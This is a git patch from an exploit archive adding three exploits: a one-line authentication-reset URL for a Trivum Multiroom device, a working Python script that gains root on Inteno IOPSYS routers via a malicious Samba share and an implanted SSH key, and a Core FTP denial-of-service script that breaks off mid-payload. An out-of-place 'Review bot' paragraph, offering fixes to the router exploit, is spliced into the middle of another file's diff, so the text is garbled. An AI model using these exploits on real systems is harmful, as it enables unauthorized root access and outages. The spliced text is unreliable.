From cfbfaba0a7532082314b7e676baca9da24ceb991 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 27 Jul 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-07-27
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

3 changes to exploits/shellcodes

Core FTP 2.0 - 'XRMD' Denial of Service (PoC)
Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation
Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)
---
 exploits/hardware/webapps/45088.txt | 19 ++++++
 exploits/linux/local/45089.py | 101 ++++++++++++++++++++++++++++
 exploits/windows/dos/45091.py | 63 +++++++++++++++++
 files_exploits.csv | 3 +
 4 files changed, 186 insertions(+)
 create mode 100644 exploits/hardware/webapps/45088.txt
 create mode 100755 exploits/linux/local/45089.py
 create mode 100755 exploits/windows/dos/45091.py

diff --git a/exploits/hardware/webapps/45088.txt b/exploits/hardware/webapps/45088.txt
new file mode 100644
index 000000000..e47792271
--- /dev/null
+++ b/exploits/hardware/webapps/45088.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)
+# Date: 2018-07-25
+# Software Link: [https://world.trivum-shop.de](https://world.trivum-shop.de/)
+# https://world.trivum-shop.de/# Version: < 9.34 build 13381 - 12.07.18
+# Category: hardware, webapps
+# Tested on: V8.76 - SNR 8604.26 - C4 Professional
+# Exploit Author: vulnc0d3c
+# CVE: CVE-2018-13859
+
+# 1. Description
+# MusicCenter / Trivum Multiroom Setup Tool V8.76 - SNR 8604.26 - C4 Professional before V9.34 build 13381 - 12.07.18,
+# allow unauthorized remote attackers to reset the authentication via "/xml/system/setAttribute.xml" URL, using GET request
+# to the end-point "?id=0&attr=protectAccess&newValue=0"
+# (successful attack will allow attackers to login without authorization).
+
+# 2. Proof of Concept
+# GET Request
+
+http://target/xml/system/setAttribute.xml?id=0&attr=protectAccess&newValue=0
\ No newline at end of file
diff --git a/exploits/linux/local/45089.py b/exploits/linux/local/45089.py
new file mode 100755
index 000000000..b58c0dd24
--- /dev/null
+++ b/exploits/linux/local/45089.py
@@ -0,0 +1,101 @@
+#!/usr/bin/python
+
+import json
+import sys
+import subprocess
+import socket
+import os
+from websocket import create_connection
+
+def ubusAuth(host, username, password):
+ ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
+ req = json.dumps({"jsonrpc":"2.0","method":"call",
+ "params":["00000000000000000000000000000000","session","login",
+ {"username": username,"password":password}],
+ "id":666})
+ ws.send(req)
+ response = json.loads(ws.recv())
+ ws.close()
+ try:
+ key = response.get('result')[1].get('ubus_rpc_session')
+ except IndexError:
+ return(None)
+ return(key)
+
+def ubusCall(host, key, namespace, argument, params={}):
+ ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
+ req = json.dumps({"jsonrpc":"2.0","method":"call",
+ "params":[key,namespace,argument,params],
+ "id":666})
+ ws.send(req)
+ response = json.loads(ws.recv())
+ ws.close()
+ try:
+ result = response.get('result')[1]
+ except IndexError:
+ if response.get('result')[0] == 0:
+ return(True)
+ return(None)
+ return(result)
+
+if __name__ == "__main__":
+ host = "192.168.1.1"
+ sshkey = "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ=="
+ user = "user"
+ pasw = "user"
+ conf = """[global]
+ netbios name = IntenoSMB
+ workgroup = IntenoSMB
+ server string = IntenoSMB
+ syslog = 10
+ encrypt passwords = true
+ passdb backend = smbpasswd
+ obey pam restrictions = yes
+ socket options = TCP_NODELAY
+ unix charset = UTF-8
+ preferred master = yes
+ os level = 20
+ security = user
+ guest account = root
+ smb passwd file = /etc/samba/smbpasswd
+ interfaces = 192.168.1.1/24 br-lan
+ bind interfaces only = yes
+ wide links = no
+
+[pwn]
+ path = /
+ read only = no
+ guest ok = yes
+ create mask = 0700
+ directory mask = 0700
+ force user = root
+"""
+
+ print("Authenticating...")
+ key = ubusAuth(host, user, pasw)
+ if (not key):
+ print("Auth failed!")
+ sys.exit(1)
+ print("Got key: %s" % key)
+
+ print("Dropping evil Samba config...")
+ ltc = ubusCall(host, key, "file", "write_tmp",
+ {"path":"/tmp/etc/smb.conf", "data": conf})
+ if (not ltc):
+ print("Failed to write evil config!")
+ sys.exit(1)
+
+ print("Creating temp file for key...")
+ with open(".key.tmp","a+") as file:
+ file.write(sshkey)
+ path = os.path.realpath(file.name)
+
+ print("Dropping key...")
+ subprocess.run("smbclient {0}pwn -U% -c 'put {1} /etc/dropbear/authorized_keys'".format(r"\\\\" + host + r"\\", path),
+ shell=True, check=True)
+ print("Key dropped")
+
+ print("Cleaning up...")
+ os.remove(path)
+
+ print("Exploitation complete. Try \"ssh root@%s\"" % host)
\ No newline at end of file
diff --git a/exploits/windows/dos/45091.py b/exploits/windows/dos/45091.py
new file mode 100755
index 000000000..a1cba5d44
--- /dev/null
+++ b/exploits/windows/dos/45091.py
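Review bot: `ubusCall` declares a mutable default argument, `params={}`, on its `def` line; the dict is only passed through to `json.dumps` here, so the shared-state hazard is latent, but the idiomatic form is `params=None` followed by `params = {} if params is None else params` as the first statement. In both `ubusAuth` and `ubusCall` the handle returned by `create_connection` is closed only on the success path — if `ws.send`, `ws.recv` or `json.loads` raises, `ws.close()` is never reached — so the send/recv/parse sequence should sit in a `try:` with `ws.close()` in a `finally:` clause. The `#!/usr/bin/python` shebang is also inconsistent with the later `subprocess.run(...)` call, which exists only from Python 3.5; `#!/usr/bin/env python3` would document the actual interpreter requirement.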
@@ -0,0 +1,63 @@
+# Exploit Title: Core FTP 2.0 - 'XRMD' Denial of Service (PoC)
+# Date: 2018-07-24
+# Exploit Author: Erik David Martin
+# Vendor Homepage: http://www.coreftp.com/
+# Software Link: http://www.coreftp.com/server/download/CoreFTPServer.exe
+# Version: Version 2.0, build 653, 32-bit
+# Tested on: Windows XP Professional, Version 2002, Service Pack 3
+# CVE: N/A
+
+# Proof of concept:
+# Create a new domain and set IP address
+# Use the default certificate by Core FTP Server
+# Set base directory
+# Create an anonymous user (anonymous:anonymous) for example
+# Set a path for the user
+# Start the server
+# Run exploit: python exploit.py *target ip* anonymous anonymous
+# Watch the server crash...
+# The exploit will work for any user, and not just anonymous
+
+import sys
+import socket
+
+try:
+ host = sys.argv[1]
+ username = sys.argv[2]
+ password = sys.argv[3]
+except:
+ print("Usage: exploit.py *target ip* *username* *password*")
+ sys.exit()
+
+mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #
+mysocket.settimeout(2)
+
+try:
+ mysocket.connect((host,21))
+ mysocket.recv(1024)
+ print("\n[+] Connected\n")
+except:
+ print("[-] Error! Could not connect to target")
+ sys.exit()
+
+junk = ("asO8M.lFX[Gq<4